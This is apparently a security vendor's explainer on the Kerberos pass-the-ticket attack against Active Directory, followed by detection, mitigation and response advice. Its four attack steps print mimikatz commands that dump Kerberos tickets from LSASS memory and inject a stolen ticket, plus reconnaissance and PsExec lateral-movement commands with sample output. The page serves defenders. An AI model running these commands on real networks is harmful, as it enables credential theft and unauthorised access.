Pass-the-Ticket

Pass-the-Ticket

Pass-the-ticket is a credential theft technique that enables adversaries to use stolen Kerberos tickets to authenticate to resources (e.g. file shares and other computers) as a user without compromising that user’s password. This technique is often used by adversaries to move laterally through an organization’s network while hunting for opportunities to escalate privileges or fulfill their mission.

Both ticket-granting service (TGS) tickets and ticket-granting tickets (TGT) can be stolen and reused by adversaries. Without administrative privileges, an adversary can obtain the TGT (using “fake delegation”) and all TGS tickets for the current user. With administrative privileges, an adversary can dump the LSASS process and obtain all TGTs and TGS tickets cached on the system.

Threat Summary

Target:

Active Directory

Tools:

ATT&CK® Tactic:

ATT&CK Technique:

Difficulty

Detect:

Medium

Mitigate:

Hard

Respond:

Medium

How Pass-the-Ticket Works

Hover to see each step


In Pass-the-Ticket, an attacker…

Step 1: An adversary uses a tool like mimikatz to extract Kerberos tickets from the memory of the LSASS.exe process.

########
# In order to capture TGTs, this invocation of mimikatz must be run from an 
# elevated shell.
########
PS> mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"
########
# mimikatz outputs all tickets to screen, and writes them individually to files
# in the current directory. We have truncated the output to show a single session.
#########
Authentication Id : 0 ; 31770591 (00000000:01e4c7df)
Session           : RemoteInteractive from 4
User Name         : joed
Domain            : DOMAIN
Logon Server      : DC1
Logon Time        : 03/07/2020 08:07:58
SID               : S-1-5-21-3501040295-3816137123-30697657-1109
 
         * Username : joed
         * Domain   : DOMAIN.COM
         * Password : (null)
 
        Group 0 - Ticket Granting Service
         [00000000]
           Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
           Service Name (03) : host ; host.domain.com ; @ DOMAIN.COM
           Target Name  (03) : host ; host.domain.com ; @ DOMAIN.COM
           Client Name  (01) : joed ; @ DOMAIN.COM ( DOMAIN.COM )
           Flags 40a10000    : name_canonicalize ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             516bedd608a71be859f1c0fa450708d915cd7e3bd99df793057ac110debfa98e
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;1e4c7df]-0-0-40a10000-joed@host-host.domain.com.kirbi !
 
        Group 1 - Client Ticket ?
 
        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
           Service Name (02) : krbtgt ; DOMAIN.COM ; @ DOMAIN.COM
           Target Name  (02) : krbtgt ; DOMAIN ; @ DOMAIN.COM
           Client Name  (01) : joed ; @ DOMAIN.COM ( DOMAIN )
           Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             34911deb40f5b400cfd9d8234b36dfdf2064b27bfabccdd65f077ed90918d85d
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi !
PS>

Step 2: Next, the threat actor uses mimikatz.exe kerberos::ptt (or a tool with similar capabilities) to inject the stolen TGT into their own session, causing their session to adopt the identity and privileges of the stolen TGT for subsequent authentications to resources.

PS> mimikatz.exe "kerberos::ptt C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi"
 
* File: 'C:\KerberosTickets\[0;1e4c7df]-2-0-40e10000-joed@krbtgt-DOMAIN.COM.kirbi': OK
PS>
# The following command can be used to verify that the right ticket was successfully injected
PS> mimikatz.exe "kerberos::list"
[00000000] - 0x00000012 - aes256_hmac
   Start/End/MaxRenew: 09/07/2020 07:45:44 ; 09/07/2020 17:45:44 ; 16/07/2020 07:45:44
   Server Name       : krbtgt/DOMAIN.COM @ DOMAIN.COM
   Client Name       : joed @ DOMAIN.COM
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
PS>

Step 3: Once a stolen ticket is ready for reuse, the threat actor needs to determine where it can be used. A stolen TGS can only be used to access the resource it was issued for and an adversary can determine that information by inspecting the TGS itself. If, however, the attacker was able to steal a TGT, the attacker may need to conduct internal reconnaissance to determine what privileges the user has to resources furthering the attacker’s objectives.

This may be as straightforward as querying the user’s group memberships looking for obvious indicators. Many tools exist to enumerate Active Directory, but an adversary can “live off the land” and use built-in commands like net to discover these details.

PS> net user joed /domain
The request will be processed at a domain controller for domain domain.com.
 
User name                    joed
Full Name                    Joe Dibley
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
 
Password last set            ‎6/‎15/‎2020 3:42:00 PM
Password expires             Never
Password changeable          ‎6/‎16/‎2020 3:42:00 PM
Password required            Yes
User may change password     Yes
 
Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   ‎7/‎9/‎2020 6:26:56 PM
 
Logon hours allowed          All
 
Local Group Memberships
Global Group memberships     *Workstation Administrators *VPNUser
                             *FileServer1_PublicShare *Domain Users
The command completed successfully.
PS>

Step 4: Using the stolen ticket and the information about the user’s privileges gleaned from internal reconnaissance, the threat actor can use lateral movement techniques to attempt to access other resources and further their objectives.

PS> .\PsExec.exe \\workstation456 powershell.exe
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
 
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Try the new cross-platform PowerShell https://aka.ms/pscore6
 
PS> hostname
workstation456
PS> 

Detect, Mitigate, and Respond

Difficulty: Medium

Endpoints and Active Directory are both sources of signals indicating active use of pass-the-ticket in an environment.

Detection on the endpoint is accomplished by:

  1. Detecting the hooking of LSASS.exe for retrieving or injecting Kerberos tickets. Many Endpoint Detection and Response solutions are capable of this; or,
  2. Analyzing logged-on sessions for a username mismatch in the logged-on user and its Kerberos tickets. We’ve created a proof-of-concept for this detection, written in PowerShell.

Detection in Active Directory can be accomplished by collecting and correlating several Kerberos event types:

  1. Develop a ledger of when a ticket-granting ticket was issued to a user and on which endpoint. Auditing of A Kerberos Authentication Ticket (TGT) was requested (Event ID 4768) and A Kerberos Service Ticket was renewed (Event ID 4770) are required to obtain these data points.
  2. Compare each request for a ticket-granting service (TGS) against the ledger to determine that the requesting endpoint is the same as the endpoint the TGT was issued to. Auditing of A Kerberos Service Ticket was requested (Event ID 4769) and A Kerberos Service Ticket was renewed (Event ID 4770) are required to perform this analysis.

The volume of these events in all but the smallest environments is substantial, which makes manual analysis impractical. As a result, real-time, machine-driven detection is preferred. It is also not possible to detect the theft and use of a single service ticket (TGS) within Active Directory.

Difficulty: Hard

While pass-the-ticket cannot be entirely eliminated, the best mitigations focus on making tickets harder to steal and limiting what a threat actor can do with a stolen ticket:

  • Enable Microsoft’s Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard builds on top of virtualization to protect credential storage and only permit trusted processes to access them.
  • Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces the risk that an adversary can use a stolen ticket for lateral movement.
  • Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that an adversary can use a stolen ticket to escalate their privileges.

Difficulty: Medium

Should the use of pass-the-ticket be detected, there are several actions one can take to immediately respond:

  • Reset the compromised user’s password, and optionally disable the user to a) force instantaneous replication to all domain controllers, and b) prevent further use of the compromised ticket.
  • Reset the password for all users who have logged on to an impacted machine.
  • Quarantine the impacted machines for forensic investigation, as well as eradication and recovery activities.
  • Activate the incident response process and alert the response team.